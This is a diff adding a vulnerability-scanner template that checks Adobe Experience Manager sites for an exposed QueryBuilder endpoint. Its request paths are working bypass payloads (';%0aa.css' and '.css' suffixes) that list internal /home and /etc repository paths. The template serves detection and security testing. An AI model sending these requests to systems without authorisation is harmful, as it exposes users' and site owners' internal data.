diff --git a/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
new file mode 100644
index 0000000000..5641c2e549
--- /dev/null
+++ b/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
@@ -0,0 +1,25 @@
+id: aem-querybuilder-internal-path-read
+
+info:
+  author: DhiyaneshDk
+  name: AEM QueryBuilder Internal Path Read
+  severity: medium
+  reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
+  tags: aem
+
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
+      - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
+      - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
+      - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - jcr:path